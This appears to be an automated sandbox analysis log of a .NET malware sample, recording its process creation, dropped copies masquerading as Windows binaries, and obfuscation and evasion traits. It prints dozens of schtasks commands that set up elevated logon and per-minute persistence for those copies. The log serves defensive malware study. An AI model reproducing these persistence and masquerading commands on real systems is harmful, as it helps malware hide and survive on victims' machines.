                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 12 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /rl HIGHEST /f
                            Source: unknown Process created: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe "C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe"
                            Source: unknown Process created: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe "C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe"
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /f
                            Source: unknown Process created: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /rl HIGHEST /f
                            Source: unknown Process created: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /rl HIGHEST /f
                            Source: unknown Process created: C:\Users\Public\Libraries\RuntimeBroker.exe C:\Users\Public\Libraries\RuntimeBroker.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 11 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                            Source: unknown Process created: C:\Users\Public\Libraries\RuntimeBroker.exe C:\Users\Public\Libraries\RuntimeBroker.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 11 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 13 /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 12 /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 9 /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 13 /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 6 /tr "'C:\Windows\Media\WinStore.App.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\Media\WinStore.App.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 10 /tr "'C:\Windows\Media\WinStore.App.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: unknown Process created: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe "C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe"
                            Source: unknown Process created: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe "C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe"
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: mscoree.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: version.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: wldp.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: profapi.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: sspicli.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Section loaded: mscoree.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Section loaded: apphelp.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Section loaded: kernel.appcore.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Section loaded: version.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Section loaded: uxtheme.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Section loaded: windows.storage.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Section loaded: wldp.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Section loaded: profapi.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Section loaded: cryptsp.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Section loaded: rsaenh.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Section loaded: cryptbase.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Section loaded: sspicli.dll
                            Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                            Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
                            Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Section loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Section loaded: apphelp.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Section loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Section loaded: version.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Section loaded: uxtheme.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Section loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Section loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Section loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Section loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Section loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Section loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Section loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                            Source: Window Recorder Window detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Directory created: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Directory created: C:\Program Files\Windows NT\TableTextService\en-US\5b884080fd4f94
                            Source: dmhu7oz5yP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: dmhu7oz5yP.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            Source: dmhu7oz5yP.exe, 78v.cs .Net Code: _9jF
                            Source: dmhu7oz5yP.exe, Ba5.cs .Net Code: _1G1 System.AppDomain.Load(byte[])
                            Source: dmhu7oz5yP.exe, Ba5.cs .Net Code: _1G1 System.Reflection.Assembly.Load(byte[])
                            Source: dmhu7oz5yP.exe, Ba5.cs .Net Code: _1G1
                            Source: WinStore.App.exe.0.dr, 78v.cs .Net Code: _9jF
                            Source: WinStore.App.exe.0.dr, Ba5.cs .Net Code: _1G1 System.AppDomain.Load(byte[])
                            Source: WinStore.App.exe.0.dr, Ba5.cs .Net Code: _1G1 System.Reflection.Assembly.Load(byte[])
                            Source: WinStore.App.exe.0.dr, Ba5.cs .Net Code: _1G1
                            Source: RuntimeBroker.exe0.0.dr, 78v.cs .Net Code: _9jF
                            Source: RuntimeBroker.exe0.0.dr, Ba5.cs .Net Code: _1G1 System.AppDomain.Load(byte[])
                            Source: RuntimeBroker.exe0.0.dr, Ba5.cs .Net Code: _1G1 System.Reflection.Assembly.Load(byte[])
                            Source: RuntimeBroker.exe0.0.dr, Ba5.cs .Net Code: _1G1
                            Source: upfc.exe.0.dr, 78v.cs .Net Code: _9jF
                            Source: upfc.exe.0.dr, Ba5.cs .Net Code: _1G1 System.AppDomain.Load(byte[])
                            Source: upfc.exe.0.dr, Ba5.cs .Net Code: _1G1 System.Reflection.Assembly.Load(byte[])
                            Source: upfc.exe.0.dr, Ba5.cs .Net Code: _1G1
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe Code function: 19_2_00007FFD9B8AFBD5 push esp; ret 19_2_00007FFD9B8AFCE9
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe Code function: 19_2_00007FFD9B89FDC7 pushad ; ret 19_2_00007FFD9B89FDA9
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe Code function: 19_2_00007FFD9B89FCF6 pushad ; ret 19_2_00007FFD9B89FDA9
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe Code function: 19_2_00007FFD9B8AFC9F push esp; ret 19_2_00007FFD9B8AFCE9

                            Persistence and Installation Behavior

                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: unknown Executable created and started: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Users\Default\RuntimeBroker.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Users\Public\Libraries\RuntimeBroker.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\Media\WinStore.App.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe

                            Boot Survival

                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Users\Default\RuntimeBroker.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeMemory allocated: A20000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeMemory allocated: 1A580000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeMemory allocated: D90000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeMemory allocated: 1ACD0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeMemory allocated: 1B0D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeMemory allocated: F00000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeMemory allocated: 1A990000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeMemory allocated: 13D0000 memory reserve | memory write watch
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeMemory allocated: 1ADA0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeMemory allocated: 2CE0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeMemory allocated: 1ACE0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeMemory allocated: 3300000 memory reserve | memory write watch
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeMemory allocated: 1B300000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeMemory allocated: A60000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeMemory allocated: 1210000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeMemory allocated: 1ABC0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 3600000Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599859Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599749Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599640Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599531Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599421Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599311Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599187Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599078Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598968Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598859Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598750Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598630Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598500Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598390Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598275Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598156Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598031Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597861Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597745Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597640Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597515Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597406Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597296Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597187Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597078Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596967Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596858Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596734Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596625Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596515Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596390Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596277Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596171Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596062Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595953Jump to behavior
